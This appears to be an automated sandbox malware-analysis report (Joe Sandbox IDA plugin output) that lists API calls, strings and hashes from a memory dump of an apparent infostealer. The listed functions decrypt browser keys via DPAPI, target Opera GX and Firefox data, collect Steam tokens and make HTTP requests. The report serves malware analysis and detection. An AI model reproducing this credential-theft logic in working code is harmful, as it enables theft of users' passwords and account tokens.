Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,00437408,00436817,?,?,?), ref: 0040B3D7
lstrlenA.KERNEL32(?), ref: 0040B529
lstrlenA.KERNEL32(?), ref: 0040B544
DeleteFileA.KERNEL32(?), ref: 0040B596

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 1f0a8faa08a8a41f1f9252360ce7b06210f1150a884dd92c063f7bbfb73194e1
Instruction ID: 2d7cdb352be037251ff445162772e287ac8a9f5930db51183a2295403b463d39
Opcode Fuzzy Hash: 1f0a8faa08a8a41f1f9252360ce7b06210f1150a884dd92c063f7bbfb73194e1
Instruction Fuzzy Hash: 77714172A00109ABCF11FBA5EE468CD7771EF14309F115036F500B71E1DBB8AE898B99

Function 0040D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,0041688A,?), ref: 00411E37

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

StrStrA.SHLWAPI(00000000,?,0043752C,004368A3), ref: 0040D49F
lstrlenA.KERNEL32(?), ref: 0040D4B2

Strings

moz-extension+++, xrefs: 0040D4DD
^userContextId=4294967295, xrefs: 0040D4D7

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 161838763-3310892237
Opcode ID: c00c8be170ebbd7d3954a4aa35f48642b26866bd6d8b3d19c3967aaa9fdf18fd
Instruction ID: 5139865869ea8be9b08f5fe68d663ed0eb90dfda87d0feda55497caafdcf607e
Opcode Fuzzy Hash: c00c8be170ebbd7d3954a4aa35f48642b26866bd6d8b3d19c3967aaa9fdf18fd
Instruction Fuzzy Hash: 4B41EA76A001199BCF11FBA5DD465CD77B5AF04308F51002AFD40B7192DBB8AE898BD9

Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,0041688A,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

"encrypted_key":", xrefs: 004081DF
, xrefs: 00408241
DPAPI, xrefs: 0040821B

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2311102621-738592651
Opcode ID: f6dea4c8558685016048f9d0cbbdd1fb67cb1a750f97c2f64ebc67628d57730f
Instruction ID: 8f456ace5eb63e6b5c45660a5b67c13678438702d76436db4cf275d83e54f361
Opcode Fuzzy Hash: f6dea4c8558685016048f9d0cbbdd1fb67cb1a750f97c2f64ebc67628d57730f
Instruction Fuzzy Hash: 8621F532E40209ABDF10EB91DD419DE7374AF41364F2044BEE950B72D0DF389E49C658

Function 00416797 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

StrCmpCA.SHLWAPI(?,ERROR), ref: 004167CC

Strings

ERROR, xrefs: 004167C4
ERROR, xrefs: 004167EF

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 3086566538-2579291623
Opcode ID: 73e49c9d77bdd377d80579308a15583fcb7910af45a7f14b7af64a90ef047861
Instruction ID: d1395ba845dfd562ab927369ae8d69837020a7c48285ca189f462824b809da7c
Opcode Fuzzy Hash: 73e49c9d77bdd377d80579308a15583fcb7910af45a7f14b7af64a90ef047861
Instruction Fuzzy Hash: A8014F75A00118ABCB21FB76D9469CD73A46E14308F514177BC24E32D3E7B8E9494ADA

Function 00416DF0 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,?,?), ref: 00416E57
CreateThread.KERNEL32(00000000,00000000,00416D1F,?,00000000,00000000), ref: 00416E8F
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416E97

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID:
API String ID: 4198075804-0
Opcode ID: af3fe125c6d2236e91838a32c8853a926b4f85230371445aece795f10d8a6443
Instruction ID: d1dd82c089f4dad0e102c0d5be451d52ec09d013246de650966d7ac7691c03ae
Opcode Fuzzy Hash: af3fe125c6d2236e91838a32c8853a926b4f85230371445aece795f10d8a6443
Instruction Fuzzy Hash: 0C213976900219ABCF10EF56EC859DE7BB9FF40314F11422BF904A3161D778AA86CFA4

Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 024127ed9f80f7268f39cc132fad59cb7699db521872e8b4484403da4d3e52bb
Instruction ID: 226699403eb24acf1245444e08daa240dedd06f6a8e661161a0893460ef1a9d9
Opcode Fuzzy Hash: 024127ed9f80f7268f39cc132fad59cb7699db521872e8b4484403da4d3e52bb
Instruction Fuzzy Hash: 45E08CB6200204BBD7449B99AC8DF8A76BCDB84715F140225F605D2250E6B4C9848B68

Function 0040C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

StrCmpCA.SHLWAPI(?,Opera GX,0043685B,0043685A,?,?,?), ref: 0040C98F

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Strings

Opera GX, xrefs: 0040C97F

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID: Opera GX
API String ID: 1719890681-3280151751
Opcode ID: 073a37ae636b7451923b8564452d7b5177c5c84e8b4e3045e2880cf5f8aa8aa7
Instruction ID: 738b7bb0fef5b6c1125dd3db8fc60cd3fb2d24df054fd1ae8008ea003252d0d6
Opcode Fuzzy Hash: 073a37ae636b7451923b8564452d7b5177c5c84e8b4e3045e2880cf5f8aa8aa7
Instruction Fuzzy Hash: 5CB1FD7294011DABDF10FFA6DE435CD7775AF04308F51013AF904771A2DAB8AE8A8B99

Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A

Strings

, xrefs: 00407B5D

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: e26cf0e0f62bce1b85f73c1492c3d9d688d3e42b09c7a9e55b440a1512f6951f
Instruction ID: b5d488af93ebb510de8610a7570bd08b410ec65ff810f60a271f89d5a680ed47
Opcode Fuzzy Hash: e26cf0e0f62bce1b85f73c1492c3d9d688d3e42b09c7a9e55b440a1512f6951f
Instruction Fuzzy Hash: 27119D71908509ABDB20DF94C684BAAB3F4FB00388F1444669641E32C0D37CBE85D75A

Function 00416289 Relevance: 3.1, APIs: 2, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 004162D1
lstrcatA.KERNEL32(?), ref: 004162EF

Part of subcall function 00415F2A: wsprintfA.USER32 ref: 00415F71
Part of subcall function 00415F2A: FindFirstFileA.KERNEL32(?,?), ref: 00415F88
Part of subcall function 00415F2A: StrCmpCA.SHLWAPI(?,00436AA8), ref: 00415FA9
Part of subcall function 00415F2A: StrCmpCA.SHLWAPI(?,00436AAC), ref: 00415FC3
Part of subcall function 00415F2A: wsprintfA.USER32 ref: 00415FEA
Part of subcall function 00415F2A: StrCmpCA.SHLWAPI(?,00436647), ref: 00415FFE
Part of subcall function 00415F2A: wsprintfA.USER32 ref: 0041601B
Part of subcall function 00415F2A: PathMatchSpecA.SHLWAPI(?,?), ref: 00416048
Part of subcall function 00415F2A: lstrcatA.KERNEL32(?), ref: 0041607E
Part of subcall function 00415F2A: lstrcatA.KERNEL32(?,00436AC4), ref: 00416090
Part of subcall function 00415F2A: lstrcatA.KERNEL32(?,?), ref: 004160A3
Part of subcall function 00415F2A: lstrcatA.KERNEL32(?,00436AC8), ref: 004160B5
Part of subcall function 00415F2A: lstrcatA.KERNEL32(?,?), ref: 004160C9

Part of subcall function 00415F2A: wsprintfA.USER32 ref: 00416032
Part of subcall function 00415F2A: FindNextFileA.KERNEL32(?,?), ref: 00416258
Part of subcall function 00415F2A: FindClose.KERNEL32(?), ref: 0041626C

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID:
API String ID: 153043497-0
Opcode ID: a15a6beac50e014bfea5b273cfeb0f5fb69bb38fc7400f9409293e7e65c30fe9
Instruction ID: 1464970669bd3f5770a2b876634469cba22f33d86fd9ce71434a8201a21ac1a8
Opcode Fuzzy Hash: a15a6beac50e014bfea5b273cfeb0f5fb69bb38fc7400f9409293e7e65c30fe9
Instruction Fuzzy Hash: 2E31E77380010EAFDB15EBA0DC03EE9777AFB08304F04149EB609A32A1EA759A95DF55

Function 00416F10 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

lstrlenA.KERNEL32(?), ref: 00416F57

Part of subcall function 00416DF0: CreateThread.KERNEL32(00000000,00000000,00416D1F,?,00000000,00000000), ref: 00416E8F
Part of subcall function 00416DF0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416E97

Strings

Soft\Steam\steam_tokens.txt, xrefs: 00416F67

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
